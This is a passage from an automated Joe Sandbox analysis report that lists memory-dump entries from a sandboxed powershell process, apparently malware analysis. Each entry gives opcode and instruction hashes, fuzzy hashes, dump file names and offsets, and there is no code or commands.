                                        • Instruction ID: 284e07901dd13e9b82aba4677ff0387efcd737cdb2e7e8821e9e1f93475dda65
                                        • Opcode Fuzzy Hash: 0266076a170a05c4bc22e2b93453ad768140af90c5a3464ae8a7df458e9285da
                                        • Instruction Fuzzy Hash: 2E91A170A002058FDB16CF58C8D4AAEFBB5FF89314B248599D856AB3A5C735FC51CBA0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1692340007.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6f10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c132562ad820b7bcc51688c5628471e67dd3d1bc4dd0f8b8167f56b382e4fd9d
                                        • Instruction ID: 65178091624f16fdf2f2bed79e7430a46451abc6c778d57b9b03e4e763f9c03c
                                        • Opcode Fuzzy Hash: c132562ad820b7bcc51688c5628471e67dd3d1bc4dd0f8b8167f56b382e4fd9d
                                        • Instruction Fuzzy Hash: 8D412931F14304CFDBA1CF658850BBA7BA2AF853D0B5980A6DB009F356DB31D945CBA2
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1686157084.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_29e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e50a245ae11008adf30d8ea8455bd092f4b8937a6ece755d73746e6969b01d80
                                        • Instruction ID: f8b164d67bdd1105d78835379aa68cb5621c3f77bc60c7c7397e5a3cedec7aed
                                        • Opcode Fuzzy Hash: e50a245ae11008adf30d8ea8455bd092f4b8937a6ece755d73746e6969b01d80
                                        • Instruction Fuzzy Hash: 3F413C74A006059FCB06CF58C4D8AAAF7B5FF49314B258199D856AB364C736FC51CBA0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1686157084.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_29e0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 243fceb00b40adfa079961d304293f432c989e5640d547908805265e096aca89
                                        • Instruction ID: 6e29adf4551be2839b71329d65f9a520e7478cb8018489b93268d9c3fbfbf754
                                        • Opcode Fuzzy Hash: 243fceb00b40adfa079961d304293f432c989e5640d547908805265e096aca89
                                        • Instruction Fuzzy Hash: 84214474E002499FCB01DF98D880AAEFBB4FF89310F108599E919AB352C731ED40CBA1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1685312085.000000000264D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0264D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_264d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3eeb3daf844052c16714b60d0fe322f9c3d8726601a12d32bba8c9f2755b22b0
                                        • Instruction ID: 5b68fe2a9d571014840d437449e5198aa1634d4501b990ac908fe29dd1660db4
                                        • Opcode Fuzzy Hash: 3eeb3daf844052c16714b60d0fe322f9c3d8726601a12d32bba8c9f2755b22b0
                                        • Instruction Fuzzy Hash: DA01F7718043849AE7104E11CCC4B67BF98EF41A25F18C01AED884B282CB78A442C7B1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1685312085.000000000264D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0264D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_264d000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed507d569c0bcb16fd5a3d32c149608fbd2e105163f6d85a2229baad13537702
                                        • Instruction ID: 9ec8d77a16038dc147370368a5036db1a5e2567be4185a4b789fe2ac211a8048
                                        • Opcode Fuzzy Hash: ed507d569c0bcb16fd5a3d32c149608fbd2e105163f6d85a2229baad13537702
                                        • Instruction Fuzzy Hash: 9201127140E3C45FD7124B258894B52BFB4DF47624F1D81DBD9888F2A3C6695849C772